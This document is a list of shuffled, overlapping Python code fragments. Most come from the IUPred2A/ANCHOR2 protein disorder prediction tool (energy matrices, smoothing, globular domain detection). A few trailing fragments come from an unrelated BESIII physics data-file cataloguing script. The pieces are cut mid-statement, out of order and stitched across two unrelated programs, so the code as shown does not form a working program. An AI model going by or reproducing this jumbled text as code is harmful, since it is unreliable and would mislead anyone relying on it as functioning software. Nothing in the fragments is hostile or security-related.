"avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in",
"in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0",
"* len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for",
"python3 import sys import textwrap import math import os from Bio import SeqIO",
"= aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc +",
"end}) in_gr = False elif in_gr: end += 1 if val > 0.3",
"+ 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode ==",
"k < nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr",
"simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence",
"par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a / par_b)",
"+= \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min +",
"help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d'",
"sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence,",
"_fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq)",
"iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx",
"+ 1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for",
"/ par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for",
"not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') +",
"= float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain",
"histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc =",
"> 0.3 and not in_gr: beg = idx end = idx in_gr =",
"uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step",
"0 kk = k + 1 if gr: beg = gr[0][0] end =",
"domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n",
"= [0] * len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx]",
"_line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max:",
"in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c:",
"idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx]",
"h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist,",
"0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3:",
"iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))]",
"1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq",
"def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a",
"anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c)",
"if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx]",
"= idx end = idx in_gr = True if in_gr: gr.append({0: beg, 1:",
"val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end})",
"+ local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa]",
"0.3 and not in_gr: beg = idx end = idx in_gr = True",
"mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in",
"for idx in range(len(seq)): for idx2 in range(idx - wc, idx + wc",
"SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for",
"Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) <",
"parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence",
"read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score",
"1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for",
"(-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage:",
"if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else:",
"print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\")",
"import math import os from Bio import SeqIO def avg(lst): return sum(lst) /",
"mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1",
"_seq def iupred(seq, mode): if mode == \"short\": lc = 1 uc =",
"elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx]",
"[0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq)",
"and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b",
"+ wc + 1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx]",
"local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit",
"import textwrap import math import os from Bio import SeqIO def avg(lst): return",
"mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1",
"'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else:",
"beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k =",
"energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx",
"= 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a",
"uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] *",
"k + 1 if gr: beg = gr[0][0] end = gr[0][1] nr =",
"* histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1",
"anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable",
"+ 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg))",
"Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add",
"_mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with",
"in_gr = False elif in_gr: end += 1 if val > 0.3 and",
"= gr[k][1] seq = seq.lower() nr = 0 res = \"\" for i",
"= anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob':",
"enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr =",
"KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size)",
"from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq",
"window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0,",
"in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx",
"uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc +",
"gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk += 1 if",
"energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in",
"anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a =",
"interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq) for idx in",
"redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research",
"+= 1 if val > 0.3 and not in_gr: beg = idx end",
"idx end = idx in_gr = True if in_gr: gr.append({0: beg, 1: end})",
"while k < nr: if kk < nr and gr[kk][0] - end <",
"_ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\")",
"(default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not",
"histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0]",
"if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found",
"range(len(seq)): for idx2 in range(idx - wc, idx + wc + 1): if",
"glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text",
"in range(0, len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n,",
"end = gr[kk][1] kk += 1 elif end - beg + 1 <",
"corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 +",
"avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file):",
"0 if mode == 'short': for idx in range(len(seq)): for idx2 in range(idx",
"globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular domain",
"iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] =",
"mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items():",
"2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg))",
"protein disorder as a function of redox state and protein binding # <NAME>,",
"idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with",
"local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b",
"= [0] * len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)):",
"- Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input",
"help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\"",
"= {} with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0]",
"local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score",
"in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif",
"= 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step =",
"\\\"glob\\\" Options \\t-d str - Location of data directory (default='./') \\t-a - Enable",
"= 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c =",
"0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign",
"gr[kk][1] kk += 1 elif end - beg + 1 < 35: k",
"beg, 1: end}) k = kk kk += 1 if k < nr:",
"par_c = 0.43 iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH))",
"h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)):",
"- h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score",
"-1 corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr",
"len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in",
"- histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size",
"0 res = \"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1]",
"par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) *",
"== 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if",
"if k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg,",
"* len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx",
"open(histo_file, \"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1])",
"seq = seq.lower() nr = 0 res = \"\" for i in mgr:",
"str - Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if",
"(iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of",
"{}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1],",
"Add SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\")",
"'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1]",
"= \"\" with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue",
"iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] -",
"kk = k + 1 if gr: beg = gr[0][0] end = gr[0][1]",
"in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0",
"IUPred2A: context-dependent prediction of protein disorder as a function of redox state and",
"= 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return",
"for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)]",
"line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score =",
"local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)): sign =",
"import os from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def",
"<NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {}",
"par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH))",
"for _aa in _seq: if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa]",
"len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx +",
"+ seq[idx + 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items():",
"- wc, idx + wc + 1): if idx2 < 0 or idx2",
"len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc)",
"for idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg,",
"interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq)",
"unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score",
"[] in_gr = False beg, end = 0, 0 for idx, val in",
"'glob': gr = [] in_gr = False beg, end = 0, 0 for",
"res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res",
"histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq)",
"+ 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq",
"h_step = (h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def",
"h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step",
"float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1])",
"<NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} #",
"10] for i in range(0, len(res), 10)]) glob_text += \"Number of globular domains:",
"predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not",
"/= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score,",
"sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH,",
"_ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx",
"as _fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])",
"mode == \"short\": lc = 1 uc = 25 wc = 10 mtx",
"< nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end})",
"lc = 1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo,",
"{} for _aa in _seq: if _aa in _freq: _freq[_aa] += 1 else:",
"in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message",
"return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list)",
"idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq",
"iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence,",
"in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos",
"- Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv)",
"len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx -",
"aa_freq(_seq): _freq = {} for _aa in _seq: if _aa in _freq: _freq[_aa]",
"else: lc = 1 uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH))",
"'-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data",
"in range(idx - wc, idx + wc + 1): if idx2 < 0",
"0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a /",
"+= seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res +=",
"= 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit =",
"[0] * len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] <",
"35: k += 1 if k < nr: beg = gr[k][0] end =",
"30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43",
"= len(gr) while k < nr: if kk < nr and gr[kk][0] -",
"= read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc = 10 mtx",
"False elif in_gr: end += 1 if val > 0.3 and not in_gr:",
"as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] *",
"_line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode): if mode ==",
"float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max =",
"- 1)] + seq[idx + 2:idx + local_window_size + 1]) for aa, freq",
"- interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score =",
"(seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location",
"type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data",
"uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step",
"gr: beg = gr[0][0] end = gr[0][1] nr = len(gr) while k <",
"_seq = \"\" with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"):",
"* (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41",
"= avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def",
"<= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max",
"_aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins",
"idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx +",
"histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc",
"len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0,",
"mode == 'short': for idx in range(len(seq)): for idx2 in range(idx - wc,",
"_freq = {} for _aa in _seq: if _aa in _freq: _freq[_aa] +=",
"0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score,",
"0.43 iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp =",
"else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text",
"- par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e",
"0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred",
"fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1])",
"unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0]",
"{}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if",
"end}) mgr = [] k = 0 kk = k + 1 if",
"_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def",
"if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False",
"histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size =",
"in range(len(seq)): for idx2 in range(idx - wc, idx + wc + 1):",
"ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file",
"_freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa]",
"* freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx",
"for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr =",
"** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg =",
"+ 1 res += seq[nr:] res = \" \".join([res[i:i + 10] for i",
"gr = [] in_gr = False beg, end = 0, 0 for idx,",
"in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx =",
"to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in",
"energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window),",
"return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line",
"= i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i + 10]",
"_mtx = {} with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if",
"+ 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val",
"mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] *",
"kk += 1 elif end - beg + 1 < 35: k +=",
"if k < nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower()",
"/ len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq: if _aa",
"0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx]",
"+ 1 if gr: beg = gr[0][0] end = gr[0][1] nr = len(gr)",
"val > 0.3 and not in_gr: beg = idx end = idx in_gr",
"\"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2",
"interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] =",
"interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0]",
"== 'short': for idx in range(len(seq)): for idx2 in range(idx - wc, idx",
"seq[nr:] res = \" \".join([res[i:i + 10] for i in range(0, len(res), 10)])",
"beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0 res",
"h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx",
"len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at",
"found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1]",
"identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv:",
"1: end}) in_gr = False elif in_gr: end += 1 if val >",
"PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found",
"gr.append({0: beg, 1: end}) mgr = [] k = 0 kk = k",
"= [] in_gr = False beg, end = 0, 0 for idx, val",
"= _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file,",
"1].upper() nr = i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i",
"'glob': lc = 1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH))",
"res += seq[nr:] res = \" \".join([res[i:i + 10] for i in range(0,"
] |
[
"os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst,",
"',' items=runIds.split(',') #members' style in items is string,we need to change their style",
"resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if",
"lfn = filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format =",
"ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get",
"string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in",
"jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check",
"eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"]",
"checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat)",
"getExpRes(runIds) if expRes == False: print \"Can't get expNum and resonance of this",
"to resList if result[4] not in resList: resList.append(result[4]) #only including one resonance if",
"str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check",
"has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile",
"to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile)",
"empty, please run createBesDir first\" return Flase for item in entries: #for each",
"= max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]:",
"commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile",
